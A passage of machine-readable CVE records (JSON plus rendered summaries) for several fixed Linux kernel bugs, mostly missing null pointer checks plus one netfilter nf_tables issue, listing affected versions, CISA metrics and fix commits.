"dateReserved": "2024-06-18T19:36:34.933Z",
"dateUpdated": "2025-11-04T17:21:44.865Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26771 (GCVE-0-2024-26771)
Vulnerability from cvelistv5
Published
2024-04-03 17:00
Modified
2025-05-04 08:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
dmaengine: ti: edma: Add some null pointer checks to the edma_probe
devm_kasprintf() returns a pointer to dynamically allocated memory
which can be NULL upon failure. Ensure the allocation was successful
by checking the pointer validity.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26771",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-08T14:05:41.933267Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:46.373Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.369Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c432094aa7c9970f2fa10d2305d550d3810657ce"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4fe4e5adc7d29d214c59b59f61db73dec505ca3d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9d508c897153ae8dd79303f7f035f078139f6b49"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7b24760f3a3c7ae1a176d343136b6c25174b7b27"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f2a5e30d1e9a629de6179fa23923a318d5feb29e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6e2276203ac9ff10fc76917ec9813c660f627369"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/dma/ti/edma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c432094aa7c9970f2fa10d2305d550d3810657ce",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4fe4e5adc7d29d214c59b59f61db73dec505ca3d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9d508c897153ae8dd79303f7f035f078139f6b49",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7b24760f3a3c7ae1a176d343136b6c25174b7b27",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f2a5e30d1e9a629de6179fa23923a318d5feb29e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6e2276203ac9ff10fc76917ec9813c660f627369",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/dma/ti/edma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: ti: edma: Add some null pointer checks to the edma_probe\n\ndevm_kasprintf() returns a pointer to dynamically allocated memory\nwhich can be NULL upon failure. Ensure the allocation was successful\nby checking the pointer validity."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:56:08.252Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c432094aa7c9970f2fa10d2305d550d3810657ce"
},
{
"url": "https://git.kernel.org/stable/c/4fe4e5adc7d29d214c59b59f61db73dec505ca3d"
},
{
"url": "https://git.kernel.org/stable/c/9d508c897153ae8dd79303f7f035f078139f6b49"
},
{
"url": "https://git.kernel.org/stable/c/7b24760f3a3c7ae1a176d343136b6c25174b7b27"
},
{
"url": "https://git.kernel.org/stable/c/f2a5e30d1e9a629de6179fa23923a318d5feb29e"
},
{
"url": "https://git.kernel.org/stable/c/6e2276203ac9ff10fc76917ec9813c660f627369"
}
],
"title": "dmaengine: ti: edma: Add some null pointer checks to the edma_probe",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26771",
"datePublished": "2024-04-03T17:00:57.918Z",
"dateReserved": "2024-02-19T14:20:24.175Z",
"dateUpdated": "2025-05-04T08:56:08.252Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52607 (GCVE-0-2023-52607)
Vulnerability from cvelistv5
Published
2024-03-06 06:45
Modified
2025-05-21 08:49
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
powerpc/mm: Fix null-pointer dereference in pgtable_cache_add
kasprintf() returns a pointer to dynamically allocated memory
which can be NULL upon failure. Ensure the allocation was successful
by checking the pointer validity.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: a0668cdc154e54bf0c85182e0535eea237d53146 Version: a0668cdc154e54bf0c85182e0535eea237d53146 Version: a0668cdc154e54bf0c85182e0535eea237d53146 Version: a0668cdc154e54bf0c85182e0535eea237d53146 Version: a0668cdc154e54bf0c85182e0535eea237d53146 Version: a0668cdc154e54bf0c85182e0535eea237d53146 Version: a0668cdc154e54bf0c85182e0535eea237d53146 Version: a0668cdc154e54bf0c85182e0535eea237d53146 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-52607",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-06T15:59:58.884148Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-05T21:10:22.475Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.330Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/21e45a7b08d7cd98d6a53c5fc5111879f2d96611"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f6781add1c311c17eff43e14c786004bbacf901e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aa28eecb43cac6e20ef14dfc50b8892c1fbcda5b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ac3ed969a40357b0542d20f096a6d43acdfa6cc7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d482d61025e303a2bef3733a011b6b740215cfa1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/145febd85c3bcc5c74d87ef9a598fc7d9122d532"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ffd29dc45bc0355393859049f6becddc3ed08f74"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f46c8a75263f97bda13c739ba1c90aced0d3b071"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/powerpc/mm/init-common.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "21e45a7b08d7cd98d6a53c5fc5111879f2d96611",
"status": "affected",
"version": "a0668cdc154e54bf0c85182e0535eea237d53146",
"versionType": "git"
},
{
"lessThan": "f6781add1c311c17eff43e14c786004bbacf901e",
"status": "affected",
"version": "a0668cdc154e54bf0c85182e0535eea237d53146",
"versionType": "git"
},
{
"lessThan": "aa28eecb43cac6e20ef14dfc50b8892c1fbcda5b",
"status": "affected",
"version": "a0668cdc154e54bf0c85182e0535eea237d53146",
"versionType": "git"
},
{
"lessThan": "ac3ed969a40357b0542d20f096a6d43acdfa6cc7",
"status": "affected",
"version": "a0668cdc154e54bf0c85182e0535eea237d53146",
"versionType": "git"
},
{
"lessThan": "d482d61025e303a2bef3733a011b6b740215cfa1",
"status": "affected",
"version": "a0668cdc154e54bf0c85182e0535eea237d53146",
"versionType": "git"
},
{
"lessThan": "145febd85c3bcc5c74d87ef9a598fc7d9122d532",
"status": "affected",
"version": "a0668cdc154e54bf0c85182e0535eea237d53146",
"versionType": "git"
},
{
"lessThan": "ffd29dc45bc0355393859049f6becddc3ed08f74",
"status": "affected",
"version": "a0668cdc154e54bf0c85182e0535eea237d53146",
"versionType": "git"
},
{
"lessThan": "f46c8a75263f97bda13c739ba1c90aced0d3b071",
"status": "affected",
"version": "a0668cdc154e54bf0c85182e0535eea237d53146",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/powerpc/mm/init-common.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.33"
},
{
"lessThan": "2.6.33",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.33",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/mm: Fix null-pointer dereference in pgtable_cache_add\n\nkasprintf() returns a pointer to dynamically allocated memory\nwhich can be NULL upon failure. Ensure the allocation was successful\nby checking the pointer validity."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T08:49:48.846Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/21e45a7b08d7cd98d6a53c5fc5111879f2d96611"
},
{
"url": "https://git.kernel.org/stable/c/f6781add1c311c17eff43e14c786004bbacf901e"
},
{
"url": "https://git.kernel.org/stable/c/aa28eecb43cac6e20ef14dfc50b8892c1fbcda5b"
},
{
"url": "https://git.kernel.org/stable/c/ac3ed969a40357b0542d20f096a6d43acdfa6cc7"
},
{
"url": "https://git.kernel.org/stable/c/d482d61025e303a2bef3733a011b6b740215cfa1"
},
{
"url": "https://git.kernel.org/stable/c/145febd85c3bcc5c74d87ef9a598fc7d9122d532"
},
{
"url": "https://git.kernel.org/stable/c/ffd29dc45bc0355393859049f6becddc3ed08f74"
},
{
"url": "https://git.kernel.org/stable/c/f46c8a75263f97bda13c739ba1c90aced0d3b071"
}
],
"title": "powerpc/mm: Fix null-pointer dereference in pgtable_cache_add",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52607",
"datePublished": "2024-03-06T06:45:31.769Z",
"dateReserved": "2024-03-02T21:55:42.574Z",
"dateUpdated": "2025-05-21T08:49:48.846Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27065 (GCVE-0-2024-27065)
Vulnerability from cvelistv5
Published
2024-05-01 13:04
Modified
2025-05-04 09:03
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: do not compare internal table flags on updates
Restore skipping transaction if table update does not modify flags.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: bf8083bbf8fa202e6e5316bbd99759ab82bfe7a3 Version: e10f661adc556c4969c70ddaddf238bffdaf1e87 Version: d9c4da8cb74e8ee6e58a064a3573aa37acf6c935 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27065",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-13T19:23:19.271055Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-13T19:23:29.610Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:27:58.377Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/845083249d6a392f3a88804e1669bdb936ee129f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2531f907d3e40a6173090f10670ae76d117ab27b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fcf32a5bfcb8a57ac0ce717fcfa4d688c91f1005"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/640dbf688ba955e83e03de84fbdda8e570b7cce4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9683cb6c2c6c0f45537bf0b8868b5d38fcb63fc7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4d37f12707ee965d338028732575f0b85f6d9e4f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3443e57654f90c9a843ab6a6040c10709fd033aa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/df257c435e51651c43b86326d112ddadda76350e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4a0e7f2decbf9bd72461226f1f5f7dcc4b08f139"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "845083249d6a392f3a88804e1669bdb936ee129f",
"status": "affected",
"version": "bf8083bbf8fa202e6e5316bbd99759ab82bfe7a3",
"versionType": "git"
},
{
"lessThan": "2531f907d3e40a6173090f10670ae76d117ab27b",
"status": "affected",
"version": "e10f661adc556c4969c70ddaddf238bffdaf1e87",
"versionType": "git"
},
{
"lessThan": "fcf32a5bfcb8a57ac0ce717fcfa4d688c91f1005",
"status": "affected",
"version": "d9c4da8cb74e8ee6e58a064a3573aa37acf6c935",
"versionType": "git"
},
{
"lessThan": "640dbf688ba955e83e03de84fbdda8e570b7cce4",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "9683cb6c2c6c0f45537bf0b8868b5d38fcb63fc7",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "4d37f12707ee965d338028732575f0b85f6d9e4f",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "3443e57654f90c9a843ab6a6040c10709fd033aa",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "df257c435e51651c43b86326d112ddadda76350e",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "4a0e7f2decbf9bd72461226f1f5f7dcc4b08f139",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.13"
},
{
"lessThan": "5.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "5.4.262",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.10.202",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: do not compare internal table flags on updates\n\nRestore skipping transaction if table update does not modify flags."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:03:27.801Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/845083249d6a392f3a88804e1669bdb936ee129f"
},
{
"url": "https://git.kernel.org/stable/c/2531f907d3e40a6173090f10670ae76d117ab27b"
},
{
"url": "https://git.kernel.org/stable/c/fcf32a5bfcb8a57ac0ce717fcfa4d688c91f1005"
},
{
"url": "https://git.kernel.org/stable/c/640dbf688ba955e83e03de84fbdda8e570b7cce4"
},
{
"url": "https://git.kernel.org/stable/c/9683cb6c2c6c0f45537bf0b8868b5d38fcb63fc7"
},
{
"url": "https://git.kernel.org/stable/c/4d37f12707ee965d338028732575f0b85f6d9e4f"
},
{
"url": "https://git.kernel.org/stable/c/3443e57654f90c9a843ab6a6040c10709fd033aa"
},
{
"url": "https://git.kernel.org/stable/c/df257c435e51651c43b86326d112ddadda76350e"
},
{
"url": "https://git.kernel.org/stable/c/4a0e7f2decbf9bd72461226f1f5f7dcc4b08f139"
}
],
"title": "netfilter: nf_tables: do not compare internal table flags on updates",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27065",
"datePublished": "2024-05-01T13:04:09.106Z",
"dateReserved": "2024-02-19T14:20:24.215Z",
"dateUpdated": "2025-05-04T09:03:27.801Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36014 (GCVE-0-2024-36014)
Vulnerability from cvelistv5
Published
2024-05-29 06:06
Modified
2025-11-04 17:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/arm/malidp: fix a possible null pointer dereference
In malidp_mw_connector_reset, new memory is allocated with kzalloc, but
no check is performed. In order to prevent null pointer dereferencing,
ensure that mw_state is checked before calling
__drm_atomic_helper_connector_reset.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 8cbc5caf36ef7a299b5cbedf55f27fd898d700bf Version: 8cbc5caf36ef7a299b5cbedf55f27fd898d700bf Version: 8cbc5caf36ef7a299b5cbedf55f27fd898d700bf Version: 8cbc5caf36ef7a299b5cbedf55f27fd898d700bf Version: 8cbc5caf36ef7a299b5cbedf55f27fd898d700bf Version: 8cbc5caf36ef7a299b5cbedf55f27fd898d700bf Version: 8cbc5caf36ef7a299b5cbedf55f27fd898d700bf Version: 8cbc5caf36ef7a299b5cbedf55f27fd898d700bf Version: 8cbc5caf36ef7a299b5cbedf55f27fd898d700bf |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36014",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-13T20:39:41.355184Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-13T20:39:53.091Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:20:54.977Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b6cc5dd06336ed8bb3a7a1fc5aaf7d5e88bc0818"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/565d9ad7e5a18eb69ed8b66a9e9bb3f45346520c"
},
{
"tags": [
"x_transferred"
],
